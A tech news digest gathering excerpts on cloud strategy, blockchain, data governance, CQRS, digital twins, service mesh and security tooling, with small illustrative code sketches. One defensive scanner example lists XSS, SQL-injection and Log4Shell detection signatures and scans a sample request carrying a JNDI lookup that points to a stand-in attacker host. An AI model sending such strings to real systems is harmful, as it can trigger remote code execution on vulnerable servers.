VMware Inc. several years ago cleaned up its fuzzy cloud strategy and partnered up with everyone. And you see above, VMware Cloud on AWS doing well, as is VMware Cloud, its on-premises offering. Even though it’s somewhat lower on the X-axis relative to last quarter, it’s moving to the right with a greater presence in the data set. Dell and HPE are also interesting. Both companies are going hard after as-a-service with APEX and GreenLake, respectively. HPE, based on the survey data from ETR, seems to have a lead in spending momentum, while Dell has a larger presence in the survey as a much bigger company. HPE is climbing up on the X-axis, as is Dell, although not as quickly. And the point we come back to often is that the definition of cloud is in the eye of the customer. AWS can say, “That’s not cloud.” And the on-prem crowd can say, “We have cloud too!” It really doesn’t matter. What matters is what the customer thinks and in which platforms they choose to invest. That’s why we keep circling back to the idea of supercloud. You are seeing it evolve and you’re going to hear more and more about it. 


Solving Business Problems With Blockchain

Smart contracts are one of the applications of blockchain that can vastly help companies secure a deal. By using smart contracts, companies can encode an agreement electronically so that a venture proceeds in a conflict-free manner. Unlike with a traditional contract, if a company tries to change the terms or refuses to release a payment, everybody on the network can leverage the technology’s transparency to see it, and the contract’s code automatically freezes the deal. The agreement does not continue until the company pays what is due or returns to the agreed guidelines. This smart management of contracts helps businesses keep operations running without friction. And because blockchain increases transparency, everyone on the network can efficiently track the incoming and outgoing products from a site. Every time a product halts at a specific gateway, the stop is documented and inserted into the blockchain ledger. This documentation increases transparency on cargo status and ensures shipments reach retailers on time and in intact condition.
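The freeze behavior described above can be modeled in a few lines. This is a toy illustration in Python, not real chain code: a deal halts whenever the agreed terms are altered or a payment is outstanding, and resumes only when the original conditions are restored.

```python
class SmartContract:
    """Toy model of a deal that freezes on term changes or unpaid dues."""

    def __init__(self, terms, amount_due):
        self.original_terms = dict(terms)
        self.terms = dict(terms)
        self.amount_due = amount_due
        self.frozen = False

    def change_terms(self, new_terms):
        # Any deviation from the agreed terms freezes the deal,
        # visibly to everyone on the network.
        self.terms = dict(new_terms)
        self.frozen = self.terms != self.original_terms

    def pay(self, amount):
        self.amount_due -= amount

    def execute_step(self):
        if self.frozen or self.amount_due > 0:
            return "deal frozen"
        return "step executed"

deal = SmartContract({"price": 100, "delivery": "7 days"}, amount_due=100)
before = deal.execute_step()   # payment still outstanding
deal.pay(100)
after = deal.execute_step()    # obligations met, deal proceeds
```

Calling `change_terms` with anything other than the original terms would put the contract back into the frozen state until the terms are restored.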


The Future of Health Data Management: Enabling a Trusted Research Environment

TRE is becoming a commonly used acronym among the science and research community. In general, a TRE is a centralized computing database that securely holds data and allows users to gain access for analysis. TREs are only accessed by approved researchers and no data ever leaves the location. Because data stays put, the risk to patient confidentiality is reduced. ... TREs are becoming the architectural backbone for health data in many research organizations. While this is a step in the right direction, many TREs still can’t communicate with those of other organizations, or even other departments within their own organization. ... As the genomic sector continues to grow, the capability of TREs to communicate will allow researchers and scientists to collaborate effectively to overcome life-threatening diseases and improve diagnosis by breaking down the “silos” of health data. That doesn’t mean moving data. Life sciences data sets are too large to move efficiently – and to complicate matters, many data security regulations forbid data to leave an organization, state or nation.


Designing Societally Beneficial Reinforcement Learning Systems

As an RL agent collects new data and the policy adapts, there is a complex interplay between current parameters, stored data, and the environment that governs evolution of the system. Changing any one of these three sources of information will change the future behavior of the agent, and moreover these three components are deeply intertwined. This uncertainty makes it difficult to back out the cause of failures or successes. In domains where many behaviors can possibly be expressed, the RL specification leaves a lot of factors constraining behavior unsaid. For a robot learning locomotion over an uneven environment, it would be useful to know what signals in the system indicate it will learn to find an easier route rather than a more complex gait. In complex situations with less well-defined reward functions, these intended or unintended behaviors will encompass a much broader range of capabilities, which may or may not have been accounted for by the designer. ... While these failure modes are closely related to control and behavioral feedback, Exo-feedback does not map as clearly to one type of error and introduces risks that do not fit into simple categories. 
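The three intertwined sources of behavior named above can be made concrete with a skeletal RL loop: the current parameters choose which data gets collected, the collected data reshapes the parameters, and the environment mediates both. Everything here is a stub for illustration, not a real training algorithm.

```python
import random

def rl_loop(env_step, steps, alpha=0.05):
    params = {"bias": 0.0}   # current parameters
    buffer = []              # stored data
    state = 0.0
    for _ in range(steps):
        action = params["bias"] + random.gauss(0, 0.1)  # parameters choose the action
        state_next, reward = env_step(state, action)    # environment responds
        buffer.append((state, action, reward))          # the chosen data gets stored
        params["bias"] += alpha * reward * action       # stored outcome reshapes parameters
        state = state_next                              # ...which changes future data
    return params, buffer

# Toy environment: reward for keeping the state near zero.
env = lambda s, a: (s + a, -abs(s + a))
random.seed(0)
params, buffer = rl_loop(env, steps=100)
```

Changing any one of the three components (the update rule, the buffer contents, or `env`) alters every subsequent iteration, which is exactly why attributing a failure to a single cause is hard.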


Don’t Fear Artificial Intelligence; Embrace it Through Data Governance

Data-centric AI is evolving, and should include relevant data management disciplines, techniques, and skills, such as data quality, data integration, and data governance, which are foundational capabilities for scaling AI. Further, data management activities don’t end once the AI model has been developed. To support this, and to allow for malleability in the ways that data is managed, HPE has launched a new initiative called Dataspaces, a powerful cloud-agnostic digital services platform aimed at putting more control into the hands of data producers and curators as they build intelligent systems. Addressing, head on, the data gravity and compliance considerations that exist for critical datasets, Dataspaces gives data producers and consumers frictionless access to the data they need, when they need it, supporting better integration, discovery, and access, enhanced collaboration, and improved governance to boot. This means that organisations can finally leverage an ecosystem of AI-centric data management tools that combine both traditional and new capabilities to prepare the enterprise for success in the era of decision intelligence.


How DAOs Are Changing Leadership

Traditionally, top-down leadership comes to those who either already have power or the ability to purchase it. Since everyone has equal shares in a DAO, authority is not "given" to anyone. Instead, it's earned by the merits of the proposals made. This creates an organization whose people follow their leaders voluntarily, which tends to yield better results, whether through growth, innovation or higher profits. This style of leadership is something all good leaders can practice. Even if they didn't "earn" their role in the same way, they can earn the trust and loyalty of their team through their actions. ... Modern corporations are like enormous ships that require huge amounts of time and effort to change course. There is endless red tape and bureaucracy to navigate before any real change can be implemented. Because DAOs are more democratic, changes can be proposed and implemented with relatively little hassle. While DAOs are primarily based on the division of funds, leaders can still note how the process works and see how efficient it is. The level of efficiency DAOs create is something that great leaders can seek to replicate in their own organizations.
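The governance mechanics described above reduce to something very simple: every member holds one equal share, and a proposal is adopted purely on its vote count, regardless of who proposed it. A minimal sketch, with invented member names:

```python
class DAO:
    """One member, one vote; a simple majority of all members adopts."""

    def __init__(self, members):
        self.members = set(members)

    def vote(self, proposal, votes):
        # votes: mapping of member -> True/False.
        # Ballots from non-members are discarded.
        valid = {m: v for m, v in votes.items() if m in self.members}
        in_favor = sum(valid.values())
        return in_favor > len(self.members) / 2

dao = DAO({"ana", "bo", "chris"})
passed = dao.vote("fund-project-x", {"ana": True, "bo": True, "chris": False})
```

Real DAOs typically weight votes by token holdings and encode the tally in an on-chain contract, but the principle is the same: authority flows from the vote, not from a title.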
 


Quote for the day:

"Challenges in life always seek leaders and leaders seek challenges." -- Wayde Goodall

Daily Tech Digest - April 30, 2022

Deep Dive into CQRS — A Great Microservices Pattern

If you want to implement the CQRS pattern into an API, it is not enough to separate the routes via POST and GET. You also have to think about how you can ensure that a command doesn’t return anything, or at least nothing but metadata. The situation is similar for the Query API. Here, the URL path describes the desired query, but in this case, the parameters are transmitted using the query string since it is a GET request. Since the queries access the read-optimized denormalized database, they can be executed quickly and efficiently. However, the problem is that without regularly polling the query routes, a client does not find out whether a command has already been processed and what the result was. Therefore, it is recommended to use a third API, the Events API, which informs about events via push notifications over web sockets, HTTP streaming, or a similar mechanism. Anyone who knows GraphQL and is reminded of the concepts of mutation, query, and subscription when reading about the commands, query, and events APIs is on the right track: GraphQL is ideal for implementing CQRS-based APIs.
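The three-API split described above can be sketched framework-free: a command mutates the write model and returns only metadata, a query reads a denormalized projection, and an events channel pushes notifications to subscribers. In a real API, the command handler would sit behind a POST route, the query handler behind a GET with a query string, and the subscribers behind web sockets; the store names here are illustrative.

```python
import uuid

write_store = {}   # normalized write model (the Command side)
read_view = {}     # denormalized, query-optimized projection (the Query side)
subscribers = []   # callbacks standing in for the push-based Events API

def handle_command(name, payload):
    """Commands return metadata only -- never the resulting data."""
    command_id = str(uuid.uuid4())
    write_store[payload["id"]] = payload
    read_view[payload["id"]] = {"summary": payload["title"]}  # update projection
    for notify in subscribers:                                # push the event
        notify({"event": name + ".handled", "command_id": command_id})
    return {"command_id": command_id, "status": "accepted"}

def handle_query(item_id):
    """Queries hit only the read-optimized view."""
    return read_view.get(item_id)

events = []
subscribers.append(events.append)   # a subscriber that just records events
meta = handle_command("create_item", {"id": "42", "title": "CQRS demo"})
```

Note that the client learns the command was processed from the pushed event, not from the command's return value, which is exactly the polling problem the Events API solves.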


Why hybrid intelligence is the future of artificial intelligence at McKinsey

“One thing that hasn’t changed: our original principle of combining the brilliance of the human mind and domain expertise with innovative technology to solve the most difficult problems,” explains Alex Sukharevsky. “We call it hybrid intelligence, and it starts from day one on every project.” AI initiatives are known to be challenging; only one in ten pilots moves into production with significant results. “Adoption and scaling aren’t things you add at the tail end of a project; they’re where you need to start,” points out Alex Singla. “We bring our technical leaders together with industry and subject-matter experts so they are part of one process, co-creating solutions and iterating models. They come to the table with the day-to-day insights of running the business that you’ll never just pick up from the data alone.” Our end-to-end and transformative approach is what sets McKinsey apart. Clients are taking notice: two years ago, most of our AI work was single use cases, and now roughly half is transformational. Another differentiating factor is the assets created by QuantumBlack Labs. 


Top 10 FWaaS providers of 2022

As cloud solutions continued to evolve, cloud-based security services had to follow their lead and this is how firewall as a service (FWaaS) came into existence. In short, FWaaS took the last stage of firewall evolution - the next-generation firewall (NGFW) - and moved it from a physical device to the cloud. There are plenty of benefits to employing FWaaS in your systems in place of an old-fashioned firewall, including simplicity, superior scalability, improved visibility and control, protection of remote workers, and cost-effectiveness. ... Unlike old-fashioned firewalls, Perimeter 81’s solution can safeguard multiple networks and control access to all data and resources of an organization. Some of its core features include identity-based access, global gateways, precise network segmentation, object-based configuration management, multi-site management, protected DNS system, safe remote work, a wide variety of integrations, flexible features, and scalable pricing. ... Secucloud’s FWaaS is a zero-trust, next-gen, AI-based solution that utilizes threat intelligence feed, secures traffic through its own VPN tunnel, and operates as a proxy providing an additional layer of security to your infrastructure.


Automated Security Alert Remediation: A Closer Look

To properly implement automatic security alert remediation, you must choose the remediation workflow that works best for your organization. Alert management works with workflows that are scripted to match a certain rule to identify possible vulnerabilities and execute resolution tasks. With automation, workflows are automatically triggered by following asset rules and constantly inspecting the remediation activity logs to execute remediation. To improve mean time to response and remediation, organizations create automated remediation workflows. For example, remediation alert playbooks aid in investigating events, blocking IP addresses or adding an IOC on a cloud firewall. There are also interactive playbooks that can help remediate issues like a DLP incident on a SaaS platform while also educating the user via dynamic interactions using the company’s communication tools. The typical alert remediation workflow consists of multiple steps. It begins with the creation of a new asset policy followed by the selection of a remediation action rule and concludes with the continued observation of the automatically quarantined rules.
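The workflow steps listed above (create an asset policy, select a remediation action rule, keep remediated items under observation) can be sketched as a small dispatch loop. All names, alert types, and actions here are hypothetical, not a real product API.

```python
def run_remediation(alerts, policy, actions):
    """Match each alert to an asset policy rule, execute the mapped
    remediation action, and return the assets held for observation."""
    quarantined = []
    for alert in alerts:
        rule = policy.get(alert["type"])   # step 1: match alert to asset policy
        if rule is None:
            continue                       # no rule -> leave for a human analyst
        actions[rule](alert)               # step 2: execute the remediation action
        quarantined.append(alert["asset"]) # step 3: observe remediated assets
    return quarantined

log = []
policy = {"malicious_ip": "block_ip", "dlp_incident": "notify_user"}
actions = {
    "block_ip": lambda a: log.append(f"blocked {a['asset']}"),
    "notify_user": lambda a: log.append(f"notified owner of {a['asset']}"),
}
held = run_remediation(
    [{"type": "malicious_ip", "asset": "203.0.113.9"},
     {"type": "dlp_incident", "asset": "drive-doc-17"}],
    policy, actions)
```

The interactive-playbook variant mentioned in the excerpt would replace the `notify_user` lambda with a dialogue through the company's communication tools rather than a one-way notification.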


Experts outline keys for strong data governance framework

Data governance is needed to manage risk, which could be anything from the use of low-quality data that leads to a bad decision to potentially running afoul of regulatory restrictions. And it's also needed to foster informed decisions that lead to growth. But setting limits on which employees can use what data, while further limiting how certain employees can use data depending on their roles, and simultaneously encouraging those same employees to explore and innovate with data are seemingly opposing principles. So a good data governance framework finds an equilibrium between risk management and enablement, according to Sean Hewitt, president and CEO of Succeed Data Governance Services, who spoke during an April 26 virtual event on data governance hosted by Eckerson Group. A good data governance framework instills confidence in employees that whatever data exploration and decision-making they do in their roles, they're doing so with proper governance guardrails in place so they're exploring and making decisions safely and securely and won't hurt their organization.


Augmented data management: Data fabric versus data mesh

The data fabric architectural approach can simplify data access in an organization and facilitate self-service data consumption at scale. This approach breaks down data silos, allowing for new opportunities to shape data governance, data integration, single customer views and trustworthy AI implementations among other common industry use cases. Since it is uniquely metadata-driven, the abstraction layer of a data fabric makes it easier to model, integrate and query any data sources, build data pipelines, and integrate data in real-time. A data fabric also streamlines deriving insights from data through better data observability and data quality by automating manual tasks across data platforms using machine learning. ... The data mesh architecture is an approach that aligns data sources by business domains, or functions, with data owners. With data ownership decentralization, data owners can create data products for their respective domains, meaning data consumers, both data scientists and business users, can use a combination of these data products for data analytics and data science.


Embracing the Platinum Rule for Data

It’s much easier to innovate around one platform and one set of data. Making this a business and not an IT imperative, you can connect data into the applications that matter. For example, creating a streamlined procure-to-pay and order-to-cash process is possible only because we’ve broken down data silos. We are now capable of distributing new customer orders to the optimum distribution facility based on the final destination and available inventory in minutes vs. multiple phone calls and data entry in multiple systems that previously would have taken hours and resources. The speed and effectiveness of these processes have led to multiple customer awards. Our teams need to store data in a harmonized form before our users start to digest and analyze the information. Today many organizations have data in multiple data lakes and data warehouses, which increases the time to insights and increases the chance for error because of multiple data formats. ... As data flows through Prism, we’re able to visualize that same data across multiple platforms while being confident in one source of the truth.


The Purpose of Enterprise Architecture

The primary purpose of the models is to help the architect understand the system being examined. Understand how it works today, understand how it can be most effectively changed to reach the aspirations of the stakeholders, and understand the implications and impacts of the change. A secondary purpose is re-use. It is simply inefficient to re-describe the Enterprise. The efficiency of consistency is balanced against the extra energy to describe more than is needed, and to train those who describe and read the descriptions on formal modeling. The size, geographic distribution, and purpose of the EA team will dramatically impact the level of consistency and formality required. Formal models are substantially more re-usable than informal models. Formal models are substantially easier to extend across work teams. The penalty is that formal models require semantic precision. For example, regardless of the structure of an application in the real world, it must be represented in a model conforming to the formal definition. This representation is possible with a good model definition.


Staying Agile: Five Trends for Enterprise Architecture

Continuous improvement is a cornerstone of agile digital business design. Organizations want to deliver more change, with higher quality results, simultaneously. Progressive, mature EAs are now designing the system that builds the system, redesigning and refactoring the enterprise’s way-of-working. This goal is a fundamental driver for many of these trends. In the pursuit of this trend, it’s important to remember that the perfect business design isn’t easily achievable. Trying one approach, learning through continuous feedback and making adjustments is a rinse and repeat process. For example, a business might use the Team Topologies technique to analyze the types of work that teams are performing and then reorganize those teams in order to minimize cognitive loads – for instance by assigning one set of teams to focus on a particular value stream while others focus solely on enabling technical capabilities. These adjustments might need to happen multiple times until the right balance is found to ensure optimal delivery of customer value and team autonomy.


Blockchain and GDPR

Given that the ruling grants EU persons the right to contest automated decisions, and smart contracts running on a blockchain are effectively making automated decisions, the GDPR needs to be taken into account when developing and deploying smart contracts that use personal data in the decision making process, and produce a legal effect or other similarly significant effect. Smart contract over-rides: The simplest means of ensuring smart contract compliance is to include code within the contract that allows a contract owner to reverse any transaction conducted. There are however a number of problems that could arise from this. ... As the appeal time can be long, many such actions may have been taken after the original contract decision, and it may not even be possible to roll back all the actions. Consent and contractual law: A second approach is to ensure that the users activating the smart contract are aware that they are entering into such a contract, and that they provide explicit consent. The GDPR provides the possibility of waiving the contesting of automated decisions under such terms, but the smart contract would require putting on hold any subsequent actions to be taken until consent is obtained.
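The two compliance approaches above, an owner override that can reverse a transaction and a consent gate that holds actions until explicit consent is recorded, can be illustrated with a toy model. This is a Python sketch of the logic, not chain code, and all names are hypothetical.

```python
class CompliantContract:
    """Toy smart contract with a GDPR-style consent gate and owner override."""

    def __init__(self, owner):
        self.owner = owner
        self.consented = set()
        self.executed = []
        self.reversed = []

    def give_consent(self, user):
        self.consented.add(user)

    def execute(self, user, action):
        if user not in self.consented:
            return "held pending consent"   # subsequent actions are put on hold
        self.executed.append((user, action))
        return "executed"

    def override(self, caller, action_index):
        # Owner-only reversal of an automated decision.
        if caller != self.owner:
            return "denied"
        self.reversed.append(self.executed[action_index])
        return "reversed"

c = CompliantContract(owner="dpo")
status_before = c.execute("alice", "transfer")   # held: no consent yet
c.give_consent("alice")
status_after = c.execute("alice", "transfer")    # now proceeds
```

The rollback problem the excerpt raises shows up even here: `override` records a reversal, but any real-world actions already triggered by the executed step may not be undoable.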



Quote for the day:

"Making good decisions is a crucial skill at every level." -- Peter Drucker

Daily Tech Digest - April 29, 2022

Scrumfall: When Agile becomes Waterfall by another name

Agile is supposed to be centered on people, not processes — on people collaborating closely to solve problems together in a culture of autonomy and mutual respect, a sustainable culture that values the health, growth, and satisfaction of every individual. There is a faith embedded in the manifesto that this approach to software engineering is both necessary and superior to older models, such as Waterfall. Necessary because of the inherent complexity and indeterminacy of software engineering. Superior because it leverages the full collaborative might of everyone’s intelligence. But this is secondary to Agile’s most fundamental idea: We value people. It’s a rare employer today who doesn’t pay lip service to that idea. “We value our people.” But many businesses instead prioritize controlling their commodity human resources. This now being unacceptable to say out loud — in software engineering circles as in much of modern America — many companies have dressed it up in Scrum’s clothing, claiming Agile ideology while reasserting Waterfall’s hierarchical micromanagement.


Nerd Cells, ‘Super-Calculating’ Network in the Human Brain Discovered

After five years of research into the theory of the continuous attractor network, or CAN, Charlotte Boccara and her group of scientists at the Institute of Basic Medical Sciences at the University of Oslo, now at the Center for Molecular Medicine Norway (NCMM), have made a breakthrough. “We are the first to clearly establish that the human brain actually contains such ‘nerd cells’ or ‘super-calculators’ put forward by the CAN theory. We found nerve cells that code for speed, position and direction all at once,” says Boccara. ... The CAN theory hypothesizes that a hidden layer of nerve cells perform complex math and compile vast amounts of information about speed, position and direction, just as NASA’s scientists do when they are adjusting a rocket trajectory. “Previously, the existence of the hidden layer was only a theory for which no clear proof existed. Now we have succeeded in finding robust evidence for the actual existence of such a brain’s ‘nerd center,’” says the researcher, “and as such we fill in a piece of the puzzle that was missing.”


Data Center Sustainability Using Digital Twins And Seagate Data Center Sustainability

Rozmanith said that Dassault’s digital twins data center construction simulation reduced time to market by 15%. He also said that the modular approach reduces design time by 20%. Their overall goal is to shorten data center stand-up time by 50% and reduce the waste commonly generated in data center construction. Even after construction, digital twins for the operation of a data center will be useful for evaluating and planning future upgrades and data center changes. Some data center companies, such as Apple, have designed their data centers to be 100% sustainable for several years. Seagate recently announced that it would power its global footprint with 100% renewable energy by 2030 and achieve carbon neutrality by 2040. These goals were announced in conjunction with the release of the company’s 16th Global Citizenship Annual Report. That report included a look at the company’s annual progress towards meeting emission reduction targets, product stewardship, talent enablement, diversity goals, labor standards, fair trade, supply chain, and more.


Industry 4.0 – why smart manufacturing is moving closer to the edge

With Industry 4.0, new technologies are being built into the factory to drive increased automation. This all leads to potentially smart factories that can, for instance, benefit from predictive maintenance, as well as improved quality assurance and worker safety. At the same time, existing data challenges can be overcome. Companies operating across multiple locations often struggle to remove data silos and bring IT and OT (operational technology) together. An edge based on an open hybrid infrastructure can help them do this, as well as solve other problems. These problems include reducing latency as a result of supporting a horizontal data framework across the organization's entire IT infrastructure, instead of relying on data being funneled through a centralized network that can cause bottlenecks. Edge computing aligned with open hybrid cloud services can also reduce the amount of mismatched and inefficient hardware that has gradually built up, and which is often located in tight remote spaces.


Digital twins: The art of the possible in product development and beyond

Digital twins are increasingly being used to improve future product generations. An electric-vehicle (EV) manufacturer, for example, uses live data from more than 80 sensors to track energy consumption under different driving regimes and in varying weather conditions. Analysis of that data allows it to upgrade its vehicle control software, with some updates introduced into new vehicles and others delivered over the air to existing customers. Developers of autonomous-driving systems, meanwhile, are increasingly developing their technology in virtual environments. The training and validation of algorithms in a simulated environment is safer and cheaper than real-world tests. Moreover, the ability to run numerous simulations in parallel has accelerated the testing process by more than 10,000 times. ... The adoption of digital twins is currently gaining momentum across industries, as companies aim to reap the benefits of various types of digital twins. Given the many different shapes and forms of digital twins, and the different starting points of each organization, a clear strategy is needed to help prioritize where to focus digital-twin development and what steps to take to capture the most value.


What Is Cloud-Native?

Cloud-native, according to most definitions, is an approach to software design, implementation, and deployment that aims to take full advantage of cloud-based services and delivery models. Cloud-native applications also typically operate using a distributed architecture. That means that application functionality is broken into multiple services, which are then spread across a hosting environment instead of being consolidated on a single server. Somewhat confusingly, cloud-native applications don't necessarily run in the cloud. It's possible to build an application according to cloud-native principles and deploy it on-premises using a platform such as Kubernetes, which mimics the distributed, service-based delivery model of cloud environments. Nonetheless, most cloud-native applications run in the cloud. And any application designed according to cloud-native principles is certainly capable of running in the cloud. ... Cloud-native is a high-level concept rather than a specific type of application architecture, design, or delivery process. Thus, there are multiple ways to create cloud-native software and a variety of tools that can help do it.
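The "functionality broken into multiple services, spread across a hosting environment" idea maps directly onto a Kubernetes Deployment, whether the cluster runs in the cloud or on-premises. A minimal sketch follows; the service name and image are hypothetical:

```yaml
# Minimal sketch of one service in a cloud-native application.
# "checkout" and the image reference are placeholders.
apiVersion: apps/v1
kind: Deployment
metadata:
  name: checkout
spec:
  replicas: 3                    # three instances spread across the cluster,
  selector:                      # not consolidated on a single server
    matchLabels:
      app: checkout
  template:
    metadata:
      labels:
        app: checkout
    spec:
      containers:
      - name: checkout
        image: example.com/checkout:1.0
        ports:
        - containerPort: 8080
```

Each service in the application would get its own Deployment like this, which is what lets the platform schedule, scale, and replace them independently.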


Predictive Analytics Could Very Well Be The Future Of Cybersecurity

Predictive analytics is gaining momentum in every industry, enabling organizations to streamline the way they do business. This branch of advanced analytics uses data, statistical algorithms, and machine learning to determine future performance. When it comes to data breaches, predictive analytics is making waves: enterprises with a limited security staff can stay safe from intricate attacks. Predictive analytics tells them where threat actors attacked in the past, helping anticipate where they'll strike next. Good security starts with knowing which attacks are to be feared. The conventional approach to fighting cybercrime is collecting data about malware, data breaches, phishing campaigns, and so on. Relevant information is extracted from those signatures. A signature here is a one-of-a-kind arrangement of information that can be used to identify a cybercriminal's attempt to exploit an operating-system or application vulnerability. The signatures can be compared against files, network traffic, and emails that flow in and out of the network to detect abnormalities. Everyone has distinct usage habits that technology can learn.
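The signature-matching step described above can be reduced to a toy sketch: each signature is a byte pattern known to appear in a specific exploit attempt, scanned against inbound traffic. The patterns and names below are made up for illustration:

```python
# Toy signature-based detection: map known exploit byte patterns to labels.
# These patterns and names are illustrative, not a real signature database.
SIGNATURES = {
    b"<script>alert(": "reflected-XSS probe",
    b"' OR '1'='1":    "SQL-injection probe",
    b"${jndi:ldap://": "Log4Shell lookup string",
}

def scan(payload: bytes) -> list:
    """Return the labels of all signatures found in the payload."""
    return [name for pattern, name in SIGNATURES.items() if pattern in payload]

hits = scan(b"GET /search?q=${jndi:ldap://evil.example/a} HTTP/1.1")
print(hits)  # → ['Log4Shell lookup string']
```

Real systems add normalization and decoding before matching, but the contrast with predictive analytics is the point: signatures can only recognize attacks that have already been catalogued, while the behavioral models the article describes try to flag what has not been seen yet.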


A Shift in Computer Vision is Coming

Neuromorphic technologies are those inspired by biological systems, including the ultimate computer, the brain, and its compute elements, the neurons. The problem is that no one fully understands exactly how neurons work. While we know that neurons act on incoming electrical signals called spikes, until relatively recently, researchers characterized neurons as rather sloppy, thinking only the number of spikes mattered. This hypothesis persisted for decades. More recent work has proven that the timing of these spikes is absolutely critical, and that the architecture of the brain creates delays in these spikes to encode information. Today’s spiking neural networks, which emulate the spike signals seen in the brain, are simplified versions of the real thing, often binary representations of spikes. “I receive a 1, I wake up, I compute, I sleep,” Benosman explained. The reality is much more complex. When a spike arrives, the neuron starts integrating the value of the spike over time; there is also leakage from the neuron, meaning the result is dynamic. There are also around 50 different types of neurons with 50 different integration profiles.
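The integrate-with-leakage behavior described here is commonly modeled as a leaky integrate-and-fire (LIF) neuron. A minimal discrete-time sketch, with illustrative leak and threshold values, shows why spike timing matters and not just spike count:

```python
def lif_neuron(spike_train, leak=0.9, threshold=1.0):
    """Toy leaky integrate-and-fire neuron (discrete time).

    Each step the membrane potential decays by `leak`, then integrates
    the incoming spike value; crossing `threshold` emits an output spike
    and resets the potential. Parameter values are illustrative.
    """
    v = 0.0
    out = []
    for s in spike_train:
        v = v * leak + s          # leak, then integrate the incoming spike
        if v >= threshold:
            out.append(1)         # fire
            v = 0.0               # reset
        else:
            out.append(0)
    return out

# Same two input spikes, different timing: close together they cross the
# threshold; spread apart, the first one leaks away before the second lands.
print(lif_neuron([0.6, 0.6, 0, 0, 0]))   # → [0, 1, 0, 0, 0]
print(lif_neuron([0.6, 0, 0, 0, 0.6]))   # → [0, 0, 0, 0, 0]
```

Biological neurons are far richer than this (hence the roughly 50 integration profiles mentioned above), but even this toy model captures how delays between spikes can encode information.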


Implementing a Secure Service Mesh

One of our main goals with using a service mesh was to get mutual Transport Layer Security (mTLS) between internal pod services for security. However, using a service mesh provides many other benefits because it allows workloads to talk across multiple Kubernetes clusters or run 100% bare-metal apps connected to Kubernetes. It offers tracing and logging of connections between pods, and it can export connection-endpoint health metrics to Prometheus. This diagram shows what a workload might look like before implementing a service mesh. In the example on the left, teams are spending time building pipes instead of building products or services, common functionality is duplicated across services, there are inconsistent security and observability practices, and there are black-box implementations with no visibility. On the right, after implementing a service mesh, the same team can focus on building products and services. They’re able to build efficient distributed architectures that are ready to scale, observability is consistent across multiple platforms, and it’s easier to enforce security and compliance best practices.
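As one concrete illustration (assuming Istio as the mesh; the excerpt does not name one), enforcing mTLS between pod services is a single policy object rather than per-service certificate plumbing:

```yaml
# Istio example: require mTLS for all workloads in the mesh.
# Placing this in the root namespace (istio-system) makes it mesh-wide.
apiVersion: security.istio.io/v1beta1
kind: PeerAuthentication
metadata:
  name: default
  namespace: istio-system
spec:
  mtls:
    mode: STRICT    # reject any plaintext pod-to-pod traffic
```

This is the "building pipes" work moving out of each team's codebase and into the mesh: certificate issuance, rotation, and enforcement happen in the sidecar layer, consistently across services.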


5 Must-Have Features of Backup as a Service For Hybrid Environments

New backup as a service offerings have redefined backup and recovery with the simplicity and flexibility of the cloud experience. Cloud-native services can eliminate the complexity of protecting your data and free you from the day-to-day hassles of managing backup infrastructure. This innovative approach to backup lets you meet SLAs in hybrid cloud environments and simplifies your infrastructure, driving significant value for your organization. Resilient data protection is key to always-on availability for data and applications in today’s changing hybrid cloud environments. While every organization has its own set of requirements, I would advise you to focus on cost efficiency, simplicity, performance, scalability, and future-readiness when architecting your strategy and evaluating new technologies. The simplest choice: a backup as a service solution that integrates all of these features in a pay-as-you-go consumption model. Modern solutions are architected to support today’s challenging IT environments.



Quote for the day:

"Leadership is like beauty; it's hard to define, but you know it when you see it." -- Warren Bennis